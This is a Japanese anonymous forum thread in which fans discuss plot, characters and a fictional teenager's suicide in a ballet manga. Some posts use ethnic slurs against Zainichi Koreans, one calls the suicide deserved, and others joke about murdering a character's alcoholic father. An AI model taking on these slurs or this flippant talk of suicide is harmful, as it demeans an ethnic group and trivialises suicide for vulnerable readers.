770 :花と名無しさん:2006/07/10(月) 21:33:47 ID:???0
六花の性格だったらクミが教えてくれるのも(教えてくれたとして)「わあ、ありがとう」って受けそうな気がする。
んでライバルとか思わずに素直に「クミちゃんってばすっごく上手!!」ってほめまくりそう。

771 :花と名無しさん:2006/07/10(月) 21:33:51 ID:???O
キナちゃんはきっと「藤田物産のお嬢さん」という設定を出したいから名字が必要だったんだろう。
まあF物産でも良かったかも知れないけど。


それにしても変な名前>キナちゃん

772 :花と名無しさん:2006/07/10(月) 21:35:40 ID:???0
空美ちゃんてコミュニケーション能力がなさすぎ
「レッスン場貸して、タダで」って友達でもない六花にいきなり話しかけて
貸してくれる訳がないとか思わないのかな
子供でバレエしか眼中にないんだろうけど
あれで将来的にダンサーとしてやっていけるんだろうか。

773 :花と名無しさん:2006/07/10(月) 21:36:02 ID:???0
そお?
今の子の中には普通に居そうじゃないの、キナちゃん。

774 :花と名無しさん:2006/07/10(月) 21:37:20 ID:???0
キナちゃんといえば、真っ先に思い浮かぶのが吉田秋生の楽園シリーズだな。

775 :花と名無しさん:2006/07/10(月) 21:38:43 ID:???0
>>772
だから、ものごころついてから他人とまともな会話した経験がないんだろうな
と思わせるような設定がうかがえるよね。

776 :花と名無しさん:2006/07/10(月) 21:38:57 ID:???0
あの家庭環境だから本来身に付いているべき対人関係のスキルも身に付いてなかったんだろうね

以前家族ぐるみで万引きしてた家族のニュースがあったけど、あの家に生まれてたら
泥棒も平気になるだろうし、それと一緒であの両親では挨拶もろくに出来ない子供になっても仕方ないかなー

777 :花と名無しさん:2006/07/10(月) 21:40:28 ID:???O
>>770
ライバルってか「到底かなわない」とか思ってるよね。

自分を過小評価しがちだし。

778 :花と名無しさん:2006/07/10(月) 21:40:35 ID:???0
>>759同意

自分が嫌いでいらないものを「あげる」っていわれてもなあ・・・
あんたが自分には糞と思ってるものが私にはお似合いとでも? と思ってしまう


779 :花と名無しさん:2006/07/10(月) 21:40:47 ID:???0
>>772
空美のアレは育ちの悪さか、それとも脳の栄養不足か…。
ユキみたいなタイプには優位に立てるかもだけど
あのまま育っていっちゃったらどこかで痛いしっぺ返しを受けそう。

780 :花と名無しさん:2006/07/10(月) 21:41:07 ID:???O
>>766
それ思う
黄菜ちゃんなんて割とある名前でもないし
あの場合は、彩乃ちゃん、美咲ちゃん程度の今どきぽい名前でも別にいいのに
だからといって黄菜ちゃんが今後、出てくるキャラだとも思わないし

カンケーないけどゴッシーは名前ないよね?

五嶋のぶえ、五嶋トシ子、とかダサかったら笑う

て、全国の、のぶえさん、トシ子さんごめんなさい
個人的なイメージの問題なのでorz

781 :花と名無しさん:2006/07/10(月) 21:41:33 ID:???0
>>772
コミュニケーション能力を身に着ける環境がないんだよってことじゃないの?

782 :花と名無しさん:2006/07/10(月) 21:41:47 ID:???0
いや結構某国(北じゃないよ)の娘さんたちってそんな感じ
そのかわり断られても
あっそう、じゃ他当たるわ〜、みたいな
平均的な性格が茜よりきっついっす

783 :花と名無しさん:2006/07/10(月) 21:43:25 ID:???0
成人してバレエを続けてるクミってのは描きにくいだろうから
もう二度と出て来ないに一票。

784 :花と名無しさん:2006/07/10(月) 21:43:53 ID:???0
なにが怖いって、あの家で一番マシなのは実は美智子かってくらい
父親と母親が腐ってるってことだ

785 :花と名無しさん:2006/07/10(月) 21:43:55 ID:???0
>>734
そだそだ、祭り状態キボンヌ
せめてそれくらいしてもらわないとな>先生
  って描かないだろうけどさ



786 :花と名無しさん:2006/07/10(月) 21:44:05 ID:???0
宝くじを当てたとか

787 :花と名無しさん:2006/07/10(月) 21:45:13 ID:???0
>>780
五嶋寛子

788 :花と名無しさん:2006/07/10(月) 21:45:21 ID:???0
>>769
チャコットは有名だけど全商品割高だからな〜

789 :花と名無しさん:2006/07/10(月) 21:45:31 ID:???0
>>780
五嶋友里恵
五嶋由利

とかどーでしょ。


790 :花と名無しさん:2006/07/10(月) 21:45:38 ID:???0
>>771
大島弓子「ダリアの帯」の黄菜(奇異な名前でしょ)とは無関係っぽいかな

791 :花と名無しさん:2006/07/10(月) 21:47:03 ID:???0
>>768
ゴッシーは初登場時にチカちゃんがフルネーム言ってた気がする。

792 :花と名無しさん:2006/07/10(月) 21:47:24 ID:???0
中学三年生飛び降り自殺の記事
こういう記事が目に付きやすくなっているな
ttp://sbc21.co.jp/my-cgi/sbc_news.cgi?page=seventop&date=20060710&id=0109736&action=details

793 :花と名無しさん:2006/07/10(月) 21:47:57 ID:???0
ゴッシー名前でてるよ。寛子(ヒロコ)。
ユキが本部に行き始めたときにチカが「五嶋寛子先生だよ」って教えてるシーンがある。
今確認したら4巻だった。


794 :花と名無しさん:2006/07/10(月) 21:49:41 ID:???0
>>787が気の毒になってきた。
たしか、本部教室にユキを連れて来た最初の日にチカがそう教えてたよね。
「ごとう」じゃなくて「ごしま」なのが自分的にはビックリだった。

795 :花と名無しさん:2006/07/10(月) 21:51:27 ID:???0
>>793
おおほんとだサンクス
4巻扉絵がジゼルでドキッとしたよ。

796 :花と名無しさん:2006/07/10(月) 21:51:32 ID:???0
ラスト予想:ボレロ

振り付け:六花
中央に空美 周りを固めてるダンサーの中にひとみ
客席に千花の遺影を手にしたお母さん

797 :花と名無しさん:2006/07/10(月) 21:53:11 ID:???0
ラストのほうなんて、いま出てきてるキャラはあんまり出て来ないだろ。
まだ出てないキャラがほとんどだと思う。

798 :花と名無しさん:2006/07/10(月) 21:53:59 ID:???0
>>796
ベジャールさんに怒られますよw

799 :花と名無しさん:2006/07/10(月) 21:54:24 ID:???0
>>796
昴の影響受けすぎ!。。と思う俺が一番受けすぎ。

800 :花と名無しさん:2006/07/10(月) 21:55:21 ID:???0
とにかく、チカが亡くなった今、美少女を出してくれ!!
来月から画面が地味になるじゃねーか。

801 :花と名無しさん:2006/07/10(月) 21:55:38 ID:???0
空美は果たしてプリマになれるか?
金銭面・スキャンダル面は置いとくとしても精神面でも障害多そう。
コミュ能力ないし何だか潤いがなさそうと言うか。

802 :花と名無しさん:2006/07/10(月) 21:55:59 ID:???0
>>799はホントに男の子なの? それとも俺女?

803 :花と名無しさん:2006/07/10(月) 21:56:16 ID:???0
「愛と悲しみのボレロ」の影響受けすぎ!と言って欲しかった

804 :花と名無しさん:2006/07/10(月) 21:57:09 ID:???O
>>787>>793
ありがと
ちゃんと名前あったんだね
しかもフツーの名前
海外留学してた頃は、ヒロとか呼ばれてたんだろうね
昔ながらの友人や家族には、ひろちゃん。
ひろちゃんなら、イメージ変わってちょっとカワイイ

805 :花と名無しさん:2006/07/10(月) 21:57:42 ID:???0
>>802
男ですが?

806 :花と名無しさん:2006/07/10(月) 21:58:23 ID:???0
>>802
ほっとけよ 肝いな

807 :花と名無しさん:2006/07/10(月) 21:59:48 ID:???0
>>801
801漫画なら、クミみたいな子をひきとって、才能を伸ばしてくれる金持ちで
社会的な地位もある男が出て来て、しかも人付き合い不器用なところまで
サポートして人の輪の中に入れてくれる というお約束があるんだが。

808 :花と名無しさん:2006/07/10(月) 22:01:59 ID:???0
>>805
いや、「昴」読者がいて嬉しかったもんで。
女の子だとあまりあの作品に好意的な人いないから。
やっぱり男の子だったんだ....。女の子で昴の漫画好きな人って少ないなぁorz


809 :花と名無しさん:2006/07/10(月) 22:02:47 ID:???0
テクニックはあっても表現力が…という感じ?>空美
確かに悪役になすがままにされ泣いてるような繊細なお姫様とかガラじゃない

810 :花と名無しさん:2006/07/10(月) 22:04:21 ID:???0
>>804
フランス語だと、イロコと読まれちゃう。


811 :花と名無しさん:2006/07/10(月) 22:06:02 ID:???0
ローザンヌ紀行で「体型、技術、テクニック、容姿、これ程過酷な条件が
幾重にも要求される道を私はほかにちょっと思いつけません」
って言ってるんだけど、技術とテクニックって別のもの?

812 :花と名無しさん:2006/07/10(月) 22:06:22 ID:???0
>>809
でも、ブルーバードの時はちゃんと表情を作って踊ってた。

813 :花と名無しさん:2006/07/10(月) 22:06:49 ID:???0
>>808
おばちゃんだけど好きだったよ ノシ
ただ途中からgdgdだったからねえ。


814 :花と名無しさん:2006/07/10(月) 22:10:07 ID:???0
おいらも昴好きだった。
ローザンヌ編が頂点だったな。
最後のボレロも良かったけどやっぱりローザンヌ編にはかなわない。

815 :花と名無しさん:2006/07/10(月) 22:10:41 ID:???0
>>808
昴は漫画としては面白いけど、バレエの視点で見るとバレエ漫画とは言えないからね〜。
テレプシ読んだ今では、どうしてもそこを比較してしまう。

816 :花と名無しさん:2006/07/10(月) 22:11:59 ID:???0
>>815
考えるな、感じるんだ

817 :花と名無しさん:2006/07/10(月) 22:12:12 ID:???0
>>793
おーほんとだ、なんか普通の名前だ

>>796
クミ登場するかなあ、、、して欲しいような欲しくないような。
かなり難ありだから、このまま成長してユキにからませるのはどーかと。

新キャラキボンヌ

クミ&美智子先生はぜひ外伝でよろしく>先生

818 :花と名無しさん:2006/07/10(月) 22:13:41 ID:???0
昴、以前は結構このスレでも話題になってたよね。だから読んだ。

819 :花と名無しさん:2006/07/10(月) 22:16:17 ID:???0
>>808
男の子?女の子?

820 :花と名無しさん:2006/07/10(月) 22:16:29 ID:???0
>>817
空美のお母さんがなんか企んでたから
保険金殺人でアル中のお父さんあぼーんするとかで経済的に復活するんでね

んで16歳位でマトモな顔立ちに成長した空美と六花とがローザンヌで再会と

821 :花と名無しさん:2006/07/10(月) 22:17:28 ID:???0
>>784
言えてる

822 :花と名無しさん:2006/07/10(月) 22:18:50 ID:???0
自己破産して国の保護対象になってるから保険金殺人は無理なはず。

823 :花と名無しさん:2006/07/10(月) 22:19:02 ID:???0
>>787気を落とすなwww

824 :花と名無しさん:2006/07/10(月) 22:20:19 ID:???0
泥酔したオヤジをトラックの通り道に寝かす!


825 :花と名無しさん:2006/07/10(月) 22:21:23 ID:???0
>>820
うーん、、、あそこまで児童ポルノやってたクミが
復活するとは思えんのだ、精神的に。



826 :花と名無しさん:2006/07/10(月) 22:21:33 ID:???0
保険金殺人といっても、月々掛け金を掛けなきゃいけないわけで、
生活保護受けてる上に、金が下りた先から飲まれてしまう
あの家では保険すら払えないんじゃないだろうか。

827 :花と名無しさん:2006/07/10(月) 22:28:40 ID:???0
俺は男だけど昴すき。
バレエとして嘘かもしれないけど、男が描くスポコンバレエ漫画としては面白いと思うよ。

曽田の絵は勢いがあって迫力あるしね。
後半あの科学者が出てきてからgdgdだったが。。。
あれは作者が昴萌えが過ぎたからだったのかな?
また再開してほしいけど、無理かも。


ギシ先生は自キャラ萌えしないから、そういうことないよねw
なんせあんだけ愛を込めて書き込んでたチカをry

828 :花と名無しさん:2006/07/10(月) 22:28:53 ID:???0
>>825
千花と同じくどん底な私生活でも踊ることが生きる支えになってたから復活するんでないの?
そのためにブルーバード頑張ったんだし

ただそれ関係で六花と揉めるエピソード発生する悪寒
空美「イジメで自殺? あんたの姉さん甘いね」
 ↓:誤解解消
空美「私も踊れなかったら自殺してた鴨」

みたいな

829 :花と名無しさん:2006/07/10(月) 22:29:14 ID:???0
んだんだ、
艶子なにか考えありそうだったけど、
いまさらその話はないだろう。

来月は、ゆき高校生あたりから進む予感。
頑張ってやってるけど、国内でウダウダやってる。

830 :花と名無しさん:2006/07/10(月) 22:31:47 ID:???0
とりあえず千花をいじめた首謀者には、今度は自分が虐められるという天罰が下って欲しい

831 :花と名無しさん:2006/07/10(月) 22:31:51 ID:???0
クミ復活がないとしたらもう残ってる伏線ないよね。
本当に先が読めない。

832 :花と名無しさん:2006/07/10(月) 22:32:25 ID:???0
>>830
人間・失格か

833 :花と名無しさん:2006/07/10(月) 22:33:49 ID:???0
艶子に考えなんてあったっけ?
空美をコンクールに出して美智子のゴキゲンをとろうとしたくらいしか
覚えてないや

834 :花と名無しさん:2006/07/10(月) 22:37:17 ID:???0
>>833
姉の前ではいい格好しいの英一に、美智子さんを介してなんかの書類にサインさせてた。

あの書類がなんだったのか結構気になる。

835 :花と名無しさん:2006/07/10(月) 22:39:04 ID:???0
>>834
あれは、レッスン受けるクミと美智子先生のために、
レッスン場を借りるって念書じゃなかったっけか。

口約束じゃ心もとないから書かせたような。

836 :花と名無しさん:2006/07/10(月) 22:42:03 ID:???0
うろ覚えと言うより、勝手にストーリー作っちゃってる人が多いねw

837 :花と名無しさん:2006/07/10(月) 22:43:02 ID:???0
>>836
コミックス持ってるなら正確なところをプリーズ

838 :花と名無しさん:2006/07/10(月) 22:46:55 ID:???0
>>836
勝手に来月は何年後に飛んでるとかなw
来月出てからにしてくれ

839 :花と名無しさん:2006/07/10(月) 22:47:05 ID:???0
妄想をふくらませながら読んでるうちに、妄想の方が本当だと脳内変換したのでは。

840 :花と名無しさん:2006/07/10(月) 22:47:49 ID:???0
>>819


841 :花と名無しさん:2006/07/10(月) 22:49:36 ID:???0
二巻の最後のほう。

「空美、そんなにコンクールに出たいの お母さんのいうとおりにできる?」
その後、艶子と空美が美智子と一緒に二三日住むという描写。
空美にレッスンを付けて欲しいと頼む艶子。
公民館で一室借りることができるが、その為には金が必要だと。
今度の「仕事」で入るお金の半分を空美のコンクールに使うように、
義姉さんから英一に頼んで欲しい。

この念書なんだね、あの書類。


読み返してやっとわかりました、スマソ

842 :花と名無しさん:2006/07/10(月) 22:53:37 ID:???0
>>823
あれで通じるだろうと思ったんだけど、
ゴッシーの名前って予想以上に印象薄かったみたいだねorz


843 :花と名無しさん:2006/07/10(月) 22:58:59 ID:???0
でも艶子は何か企んでそうだったよね。
アル中で肝臓ヤバイ夫に、今のうちに好きなだけ飲んでおけばいいわよクク
みたいに心の中でつぶやいてた。
念書もサイン部分だけ書かせて何かとすり替えたんじゃなかろうかと思えた。
あの家族の中では艶子が一番バレエの為に何でもしそうに思えた。
あんな美智子さんを恐ろしく尊敬して大事にしてたし。

844 :花と名無しさん:2006/07/10(月) 23:02:11 ID:???0
ついでに二巻読み返してて
「中学入って千花ちゃん忙しそう〜部活休ませてもらえばいいのに(大意)」
という六花に


「でも嫌なのわたしそういうの
全部やることやって…
誰にも何も言わせない」

と答える千花。。。

ぎゃー!この「誰にも」っていじめっ子って事だよね。

「お母さんの完全主義って千花ちゃんに遺伝してるよね」
って六花が言ってるけど、この完全主義が千花を殺してしまったんだな。

845 :花と名無しさん:2006/07/10(月) 23:04:30 ID:???0
千花あぼんしたら、今度は空美厨がうるさい。
早く空美もあぼんさせてくれ山岸先生。

846 :花と名無しさん:2006/07/10(月) 23:04:55 ID:???0
>>844
チカの学校って、ホントに部活必須だったんだろうか?

847 :花と名無しさん:2006/07/10(月) 23:09:43 ID:???0
>>840

いい年齢をした大人だろうに
男の子だとか女の子だとか言ってるのが痛いっつーの!

848 :花と名無しさん:2006/07/10(月) 23:10:30 ID:???0
「好きなだけ飲んでおけばいいわ」だから、ついにやるのか艶子とwktkしてたら
「空美には可哀相だけどコンクールはお義姉さんを元気付けるための名目だから」だもの
ガッカリだよ。ほんと、どれだけ美智子さんが大事なんだって感じ。

849 :花と名無しさん:2006/07/10(月) 23:15:06 ID:???0
P108の鏡を睨んでる千花とか
P133の「同情や哀れみを受けるくらいなら 無視されるほうがまし…わたしなら」(黒バック)とか

二巻は何気に不穏な影が多いな。やはり千花のいじめはF中入学から始まったと思われる。
「無視」…されてたんだろうなー。

850 :花と名無しさん:2006/07/10(月) 23:15:06 ID:???0
>>841ありがd

でも自分がひっかかってたのは>>843の指摘してた「アル中で肝臓ヤバイ夫に、今のうちに好きなだけ飲んでおけばいいわよクク
みたいに心の中でつぶやいてた」ってとこなんだよね
自分も>>843と同じく「念書」だけだったとは思えないし

851 :花と名無しさん:2006/07/10(月) 23:15:29 ID:???0
>>848
美智子がプリマの頃に側でコールドしてた艶子には美智子は
憧れで女神様の様な存在だったのだろうとは思う。
艶子も元々はそれなりにお嬢さん育ちだったのだろうか。


852 :花と名無しさん:2006/07/10(月) 23:17:46 ID:8PfwN3v00
なに、この伸びっぷり ガクブル

853 :花と名無しさん:2006/07/10(月) 23:19:27 ID:???0
「お母さんにとって美智子先生って何?すくなくともわたしやお父さんより大事な人なんだ」って
クミが言ってたよね。

ホントなんなんだろう?

854 :花と名無しさん:2006/07/10(月) 23:22:31 ID:???0
同情や哀れみを受けるくらいなら 無視されるほうがまし

でもトウシューズ盗まれたり階段から突き落とされるよりは無視されるほうがまし・・・わたしなら

855 :突然ですが:2006/07/10(月) 23:22:59 ID:???0
茜ってもしかしたらちゃんと描いたら、
名香智子の描く外人キャラみたいな顔かな。

茜って意地悪だけど妙にキライじゃないな。
頼もしいからかな?

856 :花と名無しさん:2006/07/10(月) 23:24:27 ID:???0
>>849
贔屓されたことでイジメがあって、そのいじめかたがヒドいんで助けてくれる
人もいたけど、それが同情や哀れみみたいで悔しくてそれを拒否した結果
無視されるようになった....かなぁ?

857 :花と名無しさん:2006/07/10(月) 23:27:31 ID:???0
>>855
多分茜が同じように意地悪なことをいわれても、あっけらかんと返しちゃいそう
だからじゃない? 大地との会話でもけっこうさばさばしてたから。
それに根性あって努力してるし、親がバレエ教師してないし(笑)。

858 :花と名無しさん:2006/07/10(月) 23:27:32 ID:???0
>>846
さすがに深読みしすぎでは。。。
なんかこのスレにいると
なんでも暗示、伏線に見えてくるw

859 :花と名無しさん:2006/07/10(月) 23:30:59 ID:90RciZ8S0
妄想ブッ飛びに
引く輩はもたくさんいるようだが

それだけこの作品が面白くて、魅力的だからだと思う。

おいどんだって、次号のダヴィンチが待ちきれなくて(*´Д`)ハアハア


860 :花と名無しさん:2006/07/10(月) 23:31:49 ID:???0
千花が背が伸びない事を六花に打ち明けてなぐさめられたとき、
「六花ちゃんになぐさめられちゃった」って苦笑してたのは
妹の同情や哀れみに傷ついたからか。

861 :花と名無しさん:2006/07/10(月) 23:32:14 ID:???0
同情や哀れみやいじめを受けない方法は
考えなかったのかね、チカは。
どうして自分はそんな目にあうのか、
理由を考えなかったのかな。

862 :花と名無しさん:2006/07/10(月) 23:33:51 ID:???O
妹の方が背が高い、なんて普通によくある話だよね。
千花が死なずに大人になってたら、六花に身長抜かれたかな。

863 :花と名無しさん:2006/07/10(月) 23:35:43 ID:???0
>>860
同情や哀れみではなく
姉への愛と思いやりだっただろうにね。
そうとしか思えなかったんだとしたらチカちゃん
つくづくかわいそうな子だよ。

864 :花と名無しさん:2006/07/10(月) 23:37:44 ID:???0
チカの自殺現場って当たり前だけど柵があるんだよね…
かばんをあそこに置いて、柵を乗り越えてそのままひらりと

何か虚ろだわーからっぽだわ…

865 :花と名無しさん:2006/07/10(月) 23:43:27 ID:???0
>>862
既に抜かれていた模様。

866 :花と名無しさん:2006/07/10(月) 23:44:49 ID:???0
>>863
元担任のこと、「きもいよ」って変態かなんかみたいに嫌悪してたけど、
あの先生も実際はいい先生だったのかもね。

867 :花と名無しさん:2006/07/10(月) 23:45:30 ID:???0
あれだけ美人で賢けりゃ他に楽しいこと一杯あるのに
チカちゃんはバレエ以外いらなかったんだな

868 :花と名無しさん:2006/07/10(月) 23:45:59 ID:???0
しばらく前から、「チーカちゃん、背くらべっこしようよ」なんて雰囲気じゃ
なかったもんね。
「抜いたかも」とは誰もが気づいていて、誰もが口にできなかったこと。

869 :花と名無しさん:2006/07/10(月) 23:47:05 ID:???0
>>867
千花は美人なんて言われたことは一度もないよ

870 :花と名無しさん:2006/07/10(月) 23:47:46 ID:???0
>>867
普通の子が楽しいと思うようなことは「レベルが低い」みたいに軽蔑するかもよ。

871 :花と名無しさん:2006/07/10(月) 23:50:21 ID:???0
>>869
今月号で大人クラスのおばさんが「素敵なお嬢さん」って表現してたから
やっぱりどちらかと言えば美人だと思われてたのでは。

872 :花と名無しさん:2006/07/10(月) 23:52:29 ID:???0
山岸漫画は美人とブサはそのままで描いてあるから見たまんま
千花はちょいきつめの美人で、六花は目の大きい可愛い子って感じだろと

873 :花と名無しさん:2006/07/10(月) 23:55:04 ID:???0
>>870
それじゃあ同級生に嫌われても仕方ないんじゃ...

874 :花と名無しさん:2006/07/10(月) 23:57:29 ID:???0
泥沼の医療ミス問題より、
身長の伸びが止まったことで母娘が将来について悩む
って展開の方が現実性があったろうに、
どうしても「自殺を選んだ悲劇の舞姫」を一人は描きたかったのかな。

875 :花と名無しさん:2006/07/10(月) 23:57:46 ID:???0
>>871
容姿に対して素敵とはあまり言わないと思う。
「可愛い」でも「綺麗」でも良いのに。

>>872
その辺はあまり信用できないんだよなあ。
一応千花と六花はそっくりらしいし、
額面通りに受け取るのなら茜なんて人外だし。

876 :花と名無しさん:2006/07/10(月) 23:57:58 ID:???O
賢い子は他人の楽しみを軽蔑したりしないじゃろう。

877 :花と名無しさん:2006/07/10(月) 23:58:04 ID:???0
クラスに友達ひとり作れないような性格の偏った千花が、
自爆あぼーんしたのは自業自得。

878 :花と名無しさん:2006/07/10(月) 23:59:26 ID:???0
六花が大地をカッコイイと言ってた時、千花は「バレエで負けたくない」って言っていた
男前過ぎるバレエバカ…。思えばあの頃から既に恋愛も知らずにあぼんのフラグが…

879 :花と名無しさん:2006/07/11(火) 00:00:02 ID:???0
>>875
そっくりって言うのはクララの橇の時のことだよね?
顔も似てるだろうけど、全体的な骨格とか質感のことじゃないかな?
パーツは違っても似てる兄弟っているよね。

880 :花と名無しさん:2006/07/11(火) 00:01:05 ID:hpC5lh1s0
>一応千花と六花はそっくりらしいし、

舞台化粧をした状態で似てるってのは、素顔がそっくりなのとは違うよ。

881 :花と名無しさん:2006/07/11(火) 00:01:34 ID:???0
>>873
普通の学校はどこだろうとなじめなかったっぽいからね、
日本にもワガノワみたいな小学生くらいからバレエ専門の学校があったら
千花でもクラスメートと上手く行ったんじゃね?

882 :花と名無しさん:2006/07/11(火) 00:02:37 ID:3kfpcLzp0
手術が2回も失敗してるからそんな余裕無かったんじゃない?
子供のいじめはひどいからねえ。。私の中学でいじめがあっても
対処しても徹底できなかった記憶があるよ。

883 :花と名無しさん:2006/07/11(火) 00:02:58 ID:???0
>>876
千花はそういう意味の「賢さ」はかけていたっぽい。

884 :花と名無しさん:2006/07/11(火) 00:03:02 ID:???0
>>881
そんな学校作って、社会不適合者を量産してどうするの?

885 :花と名無しさん:2006/07/11(火) 00:04:37 ID:???0
>>884
日本の伝統をけなしてた在日のおばさんですか?

886 :花と名無しさん:2006/07/11(火) 00:04:58 ID:???0
>>694
あー。
「桜姫東文章」なんか、どうしてそうなる?のオンパレードだw

887 :花と名無しさん:2006/07/11(火) 00:05:24 ID:???0
国立のバレエ学校とかは、一定数のバレエダンサーが職業としてちゃんと成り立つ国でないと、あっても意味ないよね。

888 :花と名無しさん:2006/07/11(火) 00:05:42 ID:???0
>>880
そりゃそうでしょ、子供で2歳近く違うんだし(13歳と11歳?)、当時は千花の方が背が高かった。
それでも身内が「見分けが付かん」「どう見ても千花」と言ってるんだから
やっぱりそっくりなんだと思うよ。

889 :花と名無しさん:2006/07/11(火) 00:06:14 ID:???0
>>884
ワガノワって何のことか知ってる?w
中国や韓国のことは詳しそうだけどwww

890 :花と名無しさん:2006/07/11(火) 00:08:14 ID:???0
>>889
めんへる は するー が げんそく ですよ

891 :花と名無しさん:2006/07/11(火) 00:09:00 ID:???0
ワガノワ、なんと日本語サイトがあるんだよね。
日本からの留学生志願者向けの。

892 :花と名無しさん:2006/07/11(火) 00:09:21 ID:???O
チカも小学校時代はそれなりにうまくやってたっぽいのにね…

893 :花と名無しさん:2006/07/11(火) 00:10:25 ID:???0
>>888
それを知らないんだから通りすがりの人だとオモ。
コミクス派どころかダヴィンチの立ち読みもしてない悪寒。

894 :花と名無しさん:2006/07/11(火) 00:12:29 ID:???0
>>881
>日本にもワガノワみたいな小学生くらいからバレエ専門の学校があったら

もし日本に有ったら・・・千花ちゃんでも合格するとは限らなかっただろうね。

895 :花と名無しさん:2006/07/11(火) 00:13:20 ID:???0
>>888
じゃあ身内でもない読者が見分けがつくのは何故だ???

896 :花と名無しさん:2006/07/11(火) 00:14:12 ID:???O
チカ、中学でいじめにあうまでは(て、これも確定じゃないんだけど)、フツーに友達いたんじゃ?
初めて怪我したときもバレエ教室の子、みんなお見舞い来てたし
桜子やふとみともそれなりにフレンドリーな感じだったし

897 :花と名無しさん:2006/07/11(火) 00:14:33 ID:???0
成長したユキは、性格もきつくなり、顔もきつくなって
千花に似た容姿になると予想。

898 :花と名無しさん:2006/07/11(火) 00:15:33 ID:???0
>>895
日本の伝統芸能にも無知だが、漫画も読んだことのないメンヘラさんですか。
これだから在日は(ry

899 :花と名無しさん:2006/07/11(火) 00:16:46 ID:???0
>>896
虐めに遭って、みんなから無視されるようになりました。
それまで仲の良かった友達も、ハブられるのを恐れて
千花と口をきかなくなったのです。。。。ってか?

それじゃちょっと学校のレベルが低すぎじゃ?


900 :花と名無しさん:2006/07/11(火) 00:17:12 ID:???0


顔はきれいだったんだよ・・・


お父さん、「は」ってそれじゃ顔以外のところは!!!!

901 :花と名無しさん:2006/07/11(火) 00:18:32 ID:???0
入院しても友達が見舞いにも来ないんじゃ、本人にも問題が有るんじゃないかと
思わざるをえないよなあ。死人の悪口言いたかないけど。

902 :花と名無しさん:2006/07/11(火) 00:21:57 ID:???0
久しぶりに舞姫読んだけど、金子先生が太っていて驚いた。
中年太り?

903 :花と名無しさん:2006/07/11(火) 00:22:09 ID:???0
友達がいなくても虐められても空美ちゃんは何でもないような顔をしてたな
実際なにも感じないようになっていたのかもしれない

904 :花と名無しさん:2006/07/11(火) 00:22:44 ID:???0
>>875
>一応千花と六花はそっくりらしいし、

クルミ割りのソリの時のエピソード以外に、二人がそっくりという記述は有った?
舞台化粧しちゃうと、化粧にもよるけど、全然違う人でも誰だかよくわかんなくなったりもするよ。
舞台の時だけの話なら、そっくりというのは信用できないね。

905 :花と名無しさん:2006/07/11(火) 00:24:07 ID:???0
>全然違う人でも誰だかよくわかんなくなったりもするよ。

日本語が変だな。
赤の他人でも、似たような顔になって見分けがつかなくなってしまうことすらある
ってこと。

906 :花と名無しさん:2006/07/11(火) 00:26:07 ID:???0
>900さんざんきしゅつ

907 :花と名無しさん:2006/07/11(火) 00:29:26 ID:???0
>>903
>実際なにも感じないようになっていたのかもしれない

虐待を受けて育つと感情が鈍磨するって言うよね。

908 :花と名無しさん:2006/07/11(火) 00:32:12 ID:???O
そもそもクミって何でユキの学校に転校してきたんだっけ?
そういう話あった?

909 :花と名無しさん:2006/07/11(火) 00:32:13 ID:???0
既出ですが

千恵子まさかの妊娠→女の子出産するも、母体弱り過ぎでアボン→
生まれた子を六花とねえやで育てる(父は経済担当)

育った子は【顔と運は六花・バレエ技術と正確は千花】てのが見たい。

910 :花と名無しさん:2006/07/11(火) 00:35:57 ID:???0
>>895
単にマンガとしての書き分け。一緒だったらつまらないし混乱するでしょ?
毅然とした千花はキツ目に、おっとりした六花は八の字眉毛。
顔が同じで眉毛だけ違うのも滑稽なので、それなりに変化を与える。

>>904
>クルミ割りのソリの時のエピソード以外に、二人がそっくりという記述は有った?
一度で充分だと思うよ。他に必要な場面もないし。
一応代役指名される時に「背格好も顔も似ている」と鳥山に言われているけど。
もちろん化粧前。

911 :花と名無しさん:2006/07/11(火) 00:36:49 ID:???0
べつに本人が致命的に人好きのしないタイプの
空美ちゃんみたいのでなければ、イジメは運だと思う。
先頭切って苛めるタイプに運悪くにらまれて、
あとは周りも遠巻きになり・・・というパターン。
現に椿は環境かえて苛めから脱却できたし、
千花はその反対だったわけだし。

912 :花と名無しさん:2006/07/11(火) 00:37:09 ID:???0
>>909
中学生の娘を挟んで、3人川の字に寝てるんスが。

913 :花と名無しさん:2006/07/11(火) 00:37:34 ID:qGcJkXhQ0
千花の人間性を原因にする人が多いみたいだけど

おいドンはそんなに問題や欠陥は感じられなかったなあ・・・

どちらかというと、あまりの不運の連続で
立ち直るキッカケが得られなかった(それも一連の不運)

もうちょっと幼年か、もうちょっと大人になってたら
「自殺」の選択は遠のいたかもしれないのに

丁度、難しい年代に、あんな不運の蟻地獄に落ちてしまったのも
また不運・・・



914 :花と名無しさん:2006/07/11(火) 00:39:03 ID:???0
>910
姉妹だから似てるに決まってんじゃん。
それと、姉妹であることを前提にしても、なおかつ素顔で見分けが付かないほど
(一卵性双生児みたいに)そっくりであるかどうかは、ぜんぜん別の話です。

915 :花と名無しさん:2006/07/11(火) 00:40:27 ID:???0
千花と六花が間違えられるエピソードはあるよね。
トガシーと初対面のとき、六花は千花と間違えられてるし、
金子と初対面のときも、同じく六花は千花と間違えられる。

916 :花と名無しさん:2006/07/11(火) 00:40:59 ID:???0
いくら姉/娘を亡くしたからといって川の字はありなのか。
これがPTSDというものなのか。

917 :花と名無しさん:2006/07/11(火) 00:41:35 ID:???0
>>911
椿がいじめられていたって、どこに有ったの?


918 :花と名無しさん:2006/07/11(火) 00:43:15 ID:???0
似てる似てないって程度の問題だから、どっちを主張してる人も、議論に意味無いのでは?

919 :花と名無しさん:2006/07/11(火) 00:43:53 ID:???0
910に追記。
富樫初登場時にも千花と間違われてた。

>>914
>それと、姉妹であることを前提にしても、なおかつ素顔で見分けが付かないほど
>(一卵性双生児みたいに)そっくりであるかどうかは、ぜんぜん別の話です。
そこまで言ってないよ。エスカレートしてない?
元々>>872に対するレスなんだから。

920 :花と名無しさん:2006/07/11(火) 00:44:00 ID:???0
>>916
赤ちゃん帰りという面もあるのではないかな。

921 :花と名無しさん:2006/07/11(火) 00:45:10 ID:???0
>919
872に対する、このレスが変。

>>872
その辺はあまり信用できないんだよなあ。
一応千花と六花はそっくりらしいし、
額面通りに受け取るのなら茜なんて人外だし。


922 :花と名無しさん:2006/07/11(火) 00:46:16 ID:???0
あと、双子などですごく似ている二人の区別をつける場合は、
ホクロなどで区別させるのがマンガの文法。

923 :花と名無しさん:2006/07/11(火) 00:46:58 ID:???0
もしも俺が千花たんのそばにいれば、千花たんを精一杯支えてあげれたのに!!
ギシ先生のバカ!俺の千花たんを返せ!!!1

